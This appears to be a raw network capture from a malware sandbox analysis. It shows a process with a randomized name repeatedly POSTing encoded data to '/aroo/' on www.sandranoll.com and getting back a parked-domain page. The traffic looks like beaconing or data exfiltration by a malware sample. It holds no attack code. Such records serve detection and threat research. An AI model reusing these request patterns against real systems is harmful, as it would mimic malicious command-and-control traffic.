Aug 13, 2024 06:44:53.856894016 CEST	1236	IN	Data Raw: 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 32 31 30 2e 36 31 31 22 20 79 31 3d 22 34 39 33 2e 37 31 33 22 20 78 32 3d 22 31 39 30 2e 37 33 Data Ascii: d" stroke-miterlimit="10" x1="210.611" y1="493.713" x2="190.73" y2="493.713" /> </g> </g> <g id="starsSmall"> <g> <line fill="none" stroke="#0E0
Aug 13, 2024 06:44:53.856928110 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="227.55" y1="295.189" x2="235.387" y2="295.189" /> </g> <g>
Aug 13, 2024 06:44:53.856965065 CEST	1236	IN	Data Raw: 39 36 37 22 20 78 32 3d 22 34 38 30 2e 32 39 36 22 20 79 32 3d 22 34 31 35 2e 33 32 36 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 Data Ascii: 967" x2="480.296" y2="415.326" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="484.215" y1="411.146" x2="476.378" y2="411.146" /> <
Aug 13, 2024 06:44:53.857003927 CEST	1236	IN	Data Raw: 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 33 33 2e 33 34 33 22 20 63 Data Ascii: "3" stroke-linecap="round" stroke-miterlimit="10" cx="133.343" cy="477.014" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" c
Aug 13, 2024 06:44:53.857290983 CEST	1236	IN	Data Raw: 3d 22 72 6f 75 6e 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 Data Ascii: ="round" stroke-linejoin="round" stroke-miterlimit="10" d="M273.813,410.969c0,0-54.527,39.501-115.34,38.218c-2.28-0.048-4.926-0.241-7.841-0.548c-68.038-7.178-134.288-43.963-167.33-103.87c-0.908-1.646-1.7
Aug 13, 2024 06:44:53.857327938 CEST	1120	IN	Data Raw: 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 Data Ascii: <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" d="M360.633,363.039c1.352,1.061,4.91,5.056,5.824,6.634l27.874,47.634c3.855,6.
Aug 13, 2024 06:44:53.862046957 CEST	1236	IN	Data Raw: 31 38 2e 39 39 39 2c 35 2e 31 33 34 6c 39 2e 36 38 35 2d 35 2e 35 36 34 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 Data Ascii: 18.999,5.134l9.685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" d="M241.978,395.324c-3.012-5.25-2.209-11.631,1.51

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49737	213.145.228.16	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:44:58.996001005 CEST	776	OUT	POST /aroo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.sandranoll.com Origin: http://www.sandranoll.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Referer: http://www.sandranoll.com/aroo/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 57 49 61 62 47 6c 56 58 6e 34 6c 32 38 2b 70 47 64 65 47 38 5a 70 73 32 46 4a 4d 37 64 68 78 39 31 7a 49 44 36 48 4d 53 59 4f 50 77 53 37 33 30 58 79 49 69 6c 51 64 6e 36 4b 47 61 70 77 76 64 4b 43 6e 47 48 49 4f 4e 58 54 65 69 63 30 73 47 56 67 75 57 44 44 34 36 76 2f 6c 42 73 67 6d 41 66 57 4f 48 57 6d 45 6d 6b 48 76 67 54 30 31 31 62 62 50 43 63 58 78 74 41 45 30 33 78 6a 32 31 4f 67 52 41 74 4c 56 5a 6a 4c 72 30 6a 41 72 43 66 43 6d 64 57 6b 38 64 51 63 6b 58 4e 76 70 6c 36 59 59 57 7a 32 66 62 6c 75 75 30 4d 6f 59 50 42 48 57 30 39 51 46 34 69 74 50 34 51 44 48 2f 6c 6e 32 50 75 66 6f 3d Data Ascii: jN=WIabGlVXn4l28+pGdeG8Zps2FJM7dhx91zID6HMSYOPwS730XyIilQdn6KGapwvdKCnGHIONXTeic0sGVguWDD46v/lBsgmAfWOHWmEmkHvgT011bbPCcXxtAE03xj21OgRAtLVZjLr0jArCfCmdWk8dQckXNvpl6YYWz2fbluu0MoYPBHW09QF4itP4QDH/ln2Pufo=
Aug 13, 2024 06:44:59.712213993 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Tue, 13 Aug 2024 04:44:59 GMT Server: Apache/2.4.61 (Debian) X-Powered-By: PHP/7.4.33 Strict-Transport-Security: max-age=63072000; preload Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 64 30 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 [TRUNCATED] Data Ascii: d06<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber können Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
Aug 13, 2024 06:44:59.712266922 CEST	224	IN	Data Raw: 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 6f 6e 6c 69 6e Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso können Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table
Aug 13, 2024 06:44:59.712305069 CEST	1236	IN	Data Raw: 3e 3c 74 72 3e 3c 74 64 3e 3c 74 61 62 6c 65 3e 3c 74 72 3e 3c 74 64 20 63 6f 6c 73 70 61 6e 3d 22 32 22 3e 3c 68 32 3e 44 61 73 20 4d 6f 64 75 6c 20 44 61 74 65 6e 62 61 6e 6b 65 6e 20 69 6d 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 26 72 65 67 Data Ascii: ><tr><td><table><tr><td colspan="2"><h2>Das Modul Datenbanken im Domaintechnik® Hosting Control Panel</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/fileadmin/gfx/
Aug 13, 2024 06:44:59.712341070 CEST	916	IN	Data Raw: 70 78 3b 22 3e 44 61 73 20 62 65 6b 61 6e 6e 74 65 20 75 6e 64 20 62 65 6c 69 65 62 74 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 61 6e 74 20 53 79 73 74 65 6d 20 4a 6f 6f 6d 6c 61 21 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 67 Data Ascii: px;">Das bekannte und beliebte Content Managemant System Joomla! können Sie ganz einfach über Ihr Hosting Control Panel mit wenigen Klicks installieren.</td></tr></table></td><td><table><tr><td colspan="2"><h2>Kostenlose Antivirus So
Aug 13, 2024 06:44:59.715013981 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49738	213.145.228.16	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:45:01.537466049 CEST	796	OUT	POST /aroo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.sandranoll.com Origin: http://www.sandranoll.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Referer: http://www.sandranoll.com/aroo/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 57 49 61 62 47 6c 56 58 6e 34 6c 32 75 50 35 47 61 2f 47 38 66 4a 73 31 50 70 4d 37 47 78 78 78 31 7a 45 44 36 46 67 38 62 34 33 77 53 65 4c 30 46 7a 49 69 6d 51 64 6e 78 71 47 62 74 77 76 57 4b 46 75 6d 48 4a 69 4e 58 53 36 69 63 30 38 47 55 58 36 56 52 44 34 30 32 76 6c 44 68 41 6d 41 66 57 4f 48 57 6c 34 41 6b 42 48 67 54 6c 46 31 61 36 50 64 55 33 78 75 44 45 30 33 37 44 32 78 4f 67 51 56 74 4b 4a 7a 6a 4a 6a 30 6a 46 50 43 66 33 4b 63 63 6b 39 55 55 63 6c 6e 48 50 4a 31 38 5a 73 2f 76 31 65 36 79 50 53 53 4e 65 31 6c 62 6c 65 63 75 77 70 41 79 2b 48 50 42 7a 6d 57 2f 45 6d 2f 77 49 2f 65 68 53 56 53 58 67 42 66 59 51 55 37 4b 42 33 67 58 30 57 4a Data Ascii: jN=WIabGlVXn4l2uP5Ga/G8fJs1PpM7Gxxx1zED6Fg8b43wSeL0FzIimQdnxqGbtwvWKFumHJiNXS6ic08GUX6VRD402vlDhAmAfWOHWl4AkBHgTlF1a6PdU3xuDE037D2xOgQVtKJzjJj0jFPCf3Kcck9UUclnHPJ18Zs/v1e6yPSSNe1lblecuwpAy+HPBzmW/Em/wI/ehSVSXgBfYQU7KB3gX0WJ
Aug 13, 2024 06:45:02.286267042 CEST	479	IN	HTTP/1.1 404 Not Found Date: Tue, 13 Aug 2024 04:45:02 GMT Server: Apache/2.4.61 (Debian) X-Powered-By: PHP/7.4.33 Strict-Transport-Security: max-age=63072000; preload Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a Data Ascii: ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>
Aug 13, 2024 06:45:02.286325932 CEST	1236	IN	Data Raw: 33 64 30 0d 0a 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 Data Ascii: 3d0Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" hr
Aug 13, 2024 06:45:02.286367893 CEST	224	IN	Data Raw: 6e 67 22 20 61 6c 74 3d 22 45 2d 4d 61 69 6c 22 20 2f 3e 3c 2f 74 64 3e 3c 74 64 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 22 3e 53 69 65 20 62 65 6e 26 6f 75 6d 6c 3b 74 69 67 65 6e 20 6e 75 72 20 45 2d 4d 61 69 6c 2d 41 64 72 Data Ascii: ng" alt="E-Mail" /></td><td style="width:300px;">Sie benötigen nur E-Mail-Adressen? Kein Problem! Domaintechnik.at bietet Ihnen drei verschiedene eMail Server Pakete zu Top Konditionen an. </td></tr></table></td><td><ta
Aug 13, 2024 06:45:02.286397934 CEST	1236	IN	Data Raw: 62 6c 65 3e 3c 74 72 3e 3c 74 64 20 63 6f 6c 73 70 61 6e 3d 22 32 22 3e 3c 68 32 3e 4c 69 6e 75 78 20 56 53 65 72 76 65 72 20 48 6f 73 74 69 6e 67 20 62 65 69 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 26 72 65 67 3b 3c 2f 68 32 3e 3c 2f 74 64 3e Data Ascii: ble><tr><td colspan="2"><h2>Linux VServer Hosting bei Domaintechnik®</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;width:55px;height:55px;" src="https://www.domaintechnik.at/fileadmin/gfx/icons/ssls
Aug 13, 2024 06:45:02.286489010 CEST	413	IN	Data Raw: 20 2f 3e 3c 2f 74 64 3e 3c 74 64 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 22 3e 6f 77 6e 43 6c 6f 75 64 20 2d 20 44 69 65 20 6b 6f 73 74 65 6e 6c 6f 73 65 20 4f 6e 6c 69 6e 65 2d 53 70 65 69 63 68 65 72 6c 26 6f 75 6d 6c 3b 73 Data Ascii: /></td><td style="width:300px;">ownCloud - Die kostenlose Online-Speicherlösung für Ihr Webhosting. Bereits ab dem günstigen Paket Profi-Server Start.</td></tr></table></td></tr></table></div> </div> <div class="footer">
Aug 13, 2024 06:45:02.291357040 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49739	213.145.228.16	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:45:04.068541050 CEST	1813	OUT	POST /aroo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.sandranoll.com Origin: http://www.sandranoll.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Referer: http://www.sandranoll.com/aroo/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 57 49 61 62 47 6c 56 58 6e 34 6c 32 75 50 35 47 61 2f 47 38 66 4a 73 31 50 70 4d 37 47 78 78 78 31 7a 45 44 36 46 67 38 62 37 58 77 53 73 7a 30 47 55 63 69 6e 51 64 6e 38 4b 47 65 74 77 76 4c 4b 45 4b 71 48 4a 2f 32 58 51 79 69 65 58 6b 47 46 56 43 56 4c 54 34 30 2b 50 6c 47 73 67 6d 76 66 57 65 44 57 6c 6f 41 6b 42 48 67 54 6d 64 31 63 72 50 64 53 33 78 74 41 45 30 7a 78 6a 32 56 4f 67 35 75 74 4b 4e 4a 67 39 76 30 6a 6c 2f 43 64 68 65 63 42 55 39 57 5a 38 6c 2f 48 50 45 79 38 5a 41 64 76 32 43 63 79 49 2b 53 4d 62 34 76 42 32 57 2f 34 47 68 68 2b 73 36 7a 47 6e 4b 4d 79 55 6d 79 79 4b 62 4d 69 44 4a 46 53 31 56 42 51 30 64 48 58 57 71 30 53 53 48 44 71 62 46 63 41 73 4a 36 78 54 6c 59 34 57 31 4d 4e 35 71 35 6d 47 53 54 77 72 37 44 42 6b 73 79 66 6e 62 6d 68 76 6a 54 4a 38 79 75 52 70 4e 52 7a 48 65 6e 57 42 76 53 63 2b 36 56 42 66 42 54 69 4a 38 59 4c 58 6c 34 4f 51 30 73 63 4b 4b 73 52 6d 79 6d 79 34 37 42 7a 75 4f 6e 52 57 66 35 61 4f 35 4b 39 5a 67 6d 50 44 31 53 46 64 4e 30 5a 71 79 [TRUNCATED] Data Ascii: jN=WIabGlVXn4l2uP5Ga/G8fJs1PpM7Gxxx1zED6Fg8b7XwSsz0GUcinQdn8KGetwvLKEKqHJ/2XQyieXkGFVCVLT40+PlGsgmvfWeDWloAkBHgTmd1crPdS3xtAE0zxj2VOg5utKNJg9v0jl/CdhecBU9WZ8l/HPEy8ZAdv2CcyI+SMb4vB2W/4Ghh+s6zGnKMyUmyyKbMiDJFS1VBQ0dHXWq0SSHDqbFcAsJ6xTlY4W1MN5q5mGSTwr7DBksyfnbmhvjTJ8yuRpNRzHenWBvSc+6VBfBTiJ8YLXl4OQ0scKKsRmymy47BzuOnRWf5aO5K9ZgmPD1SFdN0ZqyUQqYT9GNbIwsmn4qhVMJ/xREOF8U66xQaAKQ1NzV3tahO7/OkVTB/3FV1zxXYBAvHrnV3MiOZ4HU2WX6bQ/LHYzsPK834zJFKsMHUZRzJ6YPNIdqwVF8IbMsFInPOxcV2G4uo1QZBPCNSGAFOUFfV4HstABjgsezxaDiSY9JK+tLFqE4+3l+sXXMyeKDFgSmUCFJMjIftSUcsckEyX6ucOchIoYu/iq5Nux2l3cZnnHUKAszgSVgaSr5MsMMUc+c4UD+qbYzO0vCj3KbrbYBm/Lkr2rkk6ia8EMgJ7jTwGw7TyX22Y9OB3ARnByyUBtKgcbScVXZ5NAzKXEBe5nJyhf12HCLvnGGpxqwwc9Lps4jztSj4TN+8SppKY+tv9vWJzN3fqjULcsWdPhRmdrIfSrg8Ucpnt9GHdEtcJSmbpLo5F92yIqzdb2JFPje/jSL4ZOpGtnVZNOeMyED6jo9ZZ5A422aVqy5Z50hY4N3A+i4EkPb2Oq3Cxk1hBP2I5UNkaIk6AIK4g/5LoYgCoR7LHXzFa8A31N5eHhpZgGxKZCbHoydjwKlMXlJBySw7y99DkwdkN0TifYz609ttdOefsXieuHsrM7YUEC7Ah5cX9VeTnje3LN0DxxbRVU56eGOGwv1mIXtHpNWNDz7kndwDbKkVwMg2WIQdU [TRUNCATED]
Aug 13, 2024 06:45:04.824398041 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Tue, 13 Aug 2024 04:45:04 GMT Server: Apache/2.4.61 (Debian) X-Powered-By: PHP/7.4.33 Strict-Transport-Security: max-age=63072000; preload Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 34 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 [TRUNCATED] Data Ascii: 49a<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber können Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
Aug 13, 2024 06:45:04.824440002 CEST	1236	IN	Data Raw: 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 6f 6e 6c 69 6e Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso können Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes">856<table><tr><td><ta
Aug 13, 2024 06:45:04.824455976 CEST	448	IN	Data Raw: 69 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 26 72 65 67 3b 3c 2f 68 32 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 22 3e Data Ascii: i Domaintechnik®</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;width:55px;height:55px;" src="https://www.domaintechnik.at/fileadmin/gfx/icons/sslserver.png" alt="Linux VServer" /></td><td style="wid
Aug 13, 2024 06:45:04.826433897 CEST	682	IN	Data Raw: 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 20 41 66 66 69 6c 69 61 74 65 20 50 72 6f 67 72 61 6d 6d 3c 2f 68 32 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 70 78 3b 74 65 78 74 2d 61 6c Data Ascii: maintechnik.at Affiliate Programm</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;width:75px;height:75px" src="https://www.domaintechnik.at/fileadmin/gfx/icons/partner.jpg" alt="Affiliate Programm" /></td

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49740	213.145.228.16	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:45:06.599507093 CEST	513	OUT	GET /aroo/?uXTT=8FDHY8dP&jN=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGB3kb0OJ7ghG7VUOTSl8sxinDCxUKcrHKEU0DEmNR7hjgMQ== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.sandranoll.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
